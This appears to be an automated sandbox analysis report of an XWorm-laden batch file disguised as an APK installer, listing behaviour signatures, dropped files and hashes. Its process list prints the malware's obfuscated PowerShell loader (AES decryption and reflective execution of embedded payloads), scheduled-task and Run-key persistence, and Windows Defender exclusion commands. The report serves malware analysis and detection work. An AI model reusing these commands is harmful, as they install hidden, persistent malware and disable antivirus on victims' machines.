Analysis Overview
SHA256
3f5e7ecf09b373256a2765700ae45c9edc070a1699893a3fd11af4cda4683552
Threat Level: Known bad
The file APK_Installer.bat was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Drops startup file
Executes dropped EXE
Adds Run key to start application
Enumerates physical storage devices
Modifies data under HKEY_USERS
Enumerates system info in registry
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-30 15:06
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-30 15:06
Reported
2024-05-30 15:08
Platform
win11-20240508-en
Max time kernel
122s
Max time network
121s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Runtime Broker.exe | N/A |
| N/A | N/A | C:\Users\Admin\Runtime Broker.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Admin\\Runtime Broker.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133615552154875824" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_837_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_837.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_837.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_837.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_837.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_837.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Runtime Broker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\Runtime Broker.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff0c24ab58,0x7fff0c24ab68,0x7fff0c24ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1576 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2188 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3112 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3188 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4152 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4292 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3988 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4552 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4600 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4704 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
C:\Users\Admin\Runtime Broker.exe
"C:\Users\Admin\Runtime Broker.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4624 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3408 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3296 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3436 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E4 0x00000000000004D4
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4892 --field-trial-handle=1812,i,8375814607636798373,11734397165482703463,131072 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
C:\Users\Admin\Runtime Broker.exe
"C:\Users\Admin\Runtime Broker.exe"
Network
Files
| MD5 | 000cfb695bc437dc83cad7522c8cab3c |
| SHA1 | 5f07163b2f568ddd2d59c5eefbd8a2577dd58f7d |
| SHA256 | b72c78087d6bdccc246f4e8f346bf707b2fc2c63c871892e47e6e0b0d7baf8bd |
| SHA512 | b860a5e2506b7bb25c97b2cb73b885aa27822ec2a1ce213f4e96c2f5d100307b8bbae8bb25f837ce24f51090baee32e4403f18b3f457a78e752de171d9482911 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | f629836f9fb3d4ee82359255d6803147 |
| SHA1 | 879160fc74d49b1d86e323b5c7b1f51da9438e09 |
| SHA256 | 8df25826123d9f35203c3fce43437c9c8bbdbc7b29d3c2c93d44ee9df3922dfd |
| SHA512 | 7b6e469ebd68567d9b2a71189974b67e0e0017dd0474acd3282882d50d8122d4477c82e7f08c038307c7a8c0f87daa2fc890873499bd0a0d97da9c1506ab5a28 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 18abbb34345326f8fde4918d0535d731 |
| SHA1 | 70e0490eff7f87b71baed444f8283989126f16e6 |
| SHA256 | 0b3b5f425f58ce1416958f53a9314c4da978ab26017b1d32c9686d08bfcf256a |
| SHA512 | eb56a349ffb0c3c699d2c7a9a3932a36e3135f5f986dbb6ac43917e96e60825f4a1583e3047b91816506f222fd1a0b76b50f8900a5face9af47552be835e3d47 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | aa3230e0626c4f66ed7a3e58a7dcc97b |
| SHA1 | d3684911f3f82c59e90b8674b9a2dddb2280acbf |
| SHA256 | 3eaea5faa8f318c8febc396aee0e3bf5ac67bd46ab29e7f01e6c1b5aaf0c6b88 |
| SHA512 | 64fc196f4dff1ff3c1bcc01d36d23acfce8c4605596b674039ad34ddc388b5761468e65bc36c6498ed88633a76bf63f25a12a091a39ad3569788c39fd210033f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58da7d.TMP
| MD5 | 7c826602c5a34419f177adf7c03c7238 |
| SHA1 | ebd86c44e06015edfa1aa1ec5f9aa3e87f59f821 |
| SHA256 | 3c79b65e66015d778678f564460997a3a7cdefc5e05f85ad98f7564f845cc448 |
| SHA512 | c301b96b0ea3ec35197d0d8243e67261f760b49fffa60e288a41c4bc30d7ff3105dfd1d87e34917e619ba6440c7747ef4565f65d2a4f89dea0bd62e32cb68972 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\b4aae9a3-2732-4fc5-9e1e-8532126a8478\index-dir\the-real-index
| MD5 | f3c02b851c6abc5bbfa96c8f5fb8579b |
| SHA1 | 2fee0c966a34d205b94f338de579121f1c878d0b |
| SHA256 | 851cb56ab8a23f16b17115aa61904a9c82ebb99470d1b8b2639f93be48ceb98c |
| SHA512 | 491ba5a4ffb2699c114a095976a760c15b18aec1c58b82b5c8ef00fd21da964d156e77f881521ec843fd754fba54d054defca3f8bc1fc205326dd35df1ab87cf |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\b4aae9a3-2732-4fc5-9e1e-8532126a8478\index-dir\the-real-index~RFe58daab.TMP
| MD5 | ab5644f7d345836d1787d9808216dd4b |
| SHA1 | fe3e611763cf0fb2d3c2d13a4f19c9d8a00a7caf |
| SHA256 | fe4d59027424f998dfda8bbb4a748c14c40de91be829b5c6b9eb70dab4f0ddca |
| SHA512 | c094a741797b03ce6d5bf50475fa486389a2e183b69b12ff800daef23f1124ce2a25a6fd42f8af929644b17e5ab7db107ba90bd04ae61e701cf04a6bf7269bb3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 33082d0c5f535e20f17d106153052870 |
| SHA1 | fc70462159f01e50dc3cbe66e8bcf1d727882671 |
| SHA256 | b181cd4f5818bfcf15c5f731247407a7167f4a7b9e0338e139e9c102e84e8a84 |
| SHA512 | 0b0669678dbe80ab320150a15a8bf5d35857dcdc07e365529d92060d440184c8d85059874149408b08f6b6fb44a949c86ff9906ec5207fb8838a3dea7c5f6c03 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\3c39af4e-388b-4a34-8b08-275686669aa3\index-dir\the-real-index
| MD5 | ebd848dcf6934e855166d2e39a05b219 |
| SHA1 | 9673cbed8c0963f9ab0b02b18b9009356421e805 |
| SHA256 | cb28afb08990b93c8fac58b45ba312f576eee1fe8162db9fd9b8e7923ddf4e8d |
| SHA512 | a9615ea7a1dce33399b848842b314032d346203f20a729c499ddecfb6c70e9b3d0345bd172a207fe242078b6b40e4f76d9307c64895241df8586f3c7af4f24de |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\3c39af4e-388b-4a34-8b08-275686669aa3\index-dir\the-real-index~RFe58dcfd.TMP
| MD5 | 17e94abcb444592b7c29b146ed266225 |
| SHA1 | 1f5714a345986389bb78ddc43d31e16547f247a8 |
| SHA256 | c1398ad501b7865bf431292a046b8f843580a63cc291a84d4f0570ba74df9463 |
| SHA512 | 4a2ecc506f239fb83c0db94106a65adcccb6adffaf0e89576ceb39261dc6da391432eee58542906c3fecfbd79f81fce010d2846a37c83ded928021856f8ec7f0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\index.txt
| MD5 | 91d3addd55d196164f446a2e0a2c4670 |
| SHA1 | beb6cfdb45549b3faad37124afbc6735d28cdbdb |
| SHA256 | 24a16e796ae6c6e0c7b3e84c9adbec8dabb2f087f6a03ca9ae6a366e4d329208 |
| SHA512 | 6b7aad8e0a55e7ec0255cc92c1ab3f17d96ad4985caa29b3139bd95a3d2193632f19ce3e98322a428ffc483bc2eed388b1631dd64ac7270c921bb2366742c8fa |
memory/3760-663-0x0000020C7CB70000-0x0000020C7CBFE000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Runtime Broker.exe.log
| MD5 | 627073ee3ca9676911bee35548eff2b8 |
| SHA1 | 4c4b68c65e2cab9864b51167d710aa29ebdcff2e |
| SHA256 | 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c |
| SHA512 | 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 82fa4a888cbdfa7fee6c937009faa09d |
| SHA1 | ccd30a243634b505642e89c60c128acad5cf8ba9 |
| SHA256 | 71eca5c0a2738ec9154045e1b2be6ac19a41f9bcc341a2e3d613f74a2212ea55 |
| SHA512 | 971f6009d1cf3ac33d44cc6521cc490aca9643865ce97517290e52b8dacb14ba615590b57f4ef10ab1659a3897558c5f088e7d5d366c4f0c0e10828c73be214e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 847bc97307c58707a3c38f2b6e1a444d |
| SHA1 | 1f867077a5624bc8a3d44a9f36505fa5f9ea2707 |
| SHA256 | 5d3e83f727bb06c84efc27ba8b844152ed92f35e7377e22ca830e67debcda9c3 |
| SHA512 | e936c5f3332011af9a6cd6183642efd313892b2f6741d412343ad1055a16cf10ad6dff17da57650f5aa7f62e9630c08825bc3a2e6da94ae9330d390293f21dd7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 209353a74c45edb9f25917b640f962f6 |
| SHA1 | 5d9304edfdd7e6576dfaa43615b10c7c0a3ddea9 |
| SHA256 | 318cf5f5e5787d6ae5f4feb4cf1d1e49236086e8e63b6fe314e1e68825b21e78 |
| SHA512 | 01981757ef00ca8a6383b7e5e9fdb6e1038e2725de6f2b23f0feefc048d53858e1e66d8aa19f180cad5d68ab4e6afb8751e44c195e36280772e0e1bfc79fb059 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 376049a960407231a4d4755454e56f89 |
| SHA1 | a76c8ac786093e51a8c3772601b52be563be985f |
| SHA256 | 257fdc20af0236c9eeba61c2647bd950eb26dea400a2d267b50be7d70cf4615c |
| SHA512 | 6bd66b972d4f364891c03791dd5932b85cd9ae850f0ed4708e67183290bb497ae429482acd4977ab79c5ba31d074b577bbb2624ed7c056f4869bf088ad9c0b77 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 5bb333c33ec30cda96e6bd471c8a6145 |
| SHA1 | d0541eda57d733339a2acf4a8b8e12e10d910787 |
| SHA256 | 78d88758aa1f10b91caa59c55669c6fc29fc7bd71aabc212fc49acb750d419c3 |
| SHA512 | 962941b58cf78ea4a31b9dca797e6e302eda88e5c4b04f13b25e6d6a618f1cc62af21c4a0176db5682ac065ed2be925828aae1a7315d9a68b365759367077464 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 865a551095e53d195927e9cc1689ad40 |
| SHA1 | f20c7a70ba70119101d013b816b30c2e525242de |
| SHA256 | 8c1a9e10d82384e3cba34cdc4941ec38ad10fa7cde11def71190415e8bf89b18 |
| SHA512 | 5048b482ec7d939466d83c8f7ca0225edf860ade55a2deb2793f351c0ff084ae251dc78cea843c1667bd6398638bf74953f5226a338503b244c997128e89b901 |
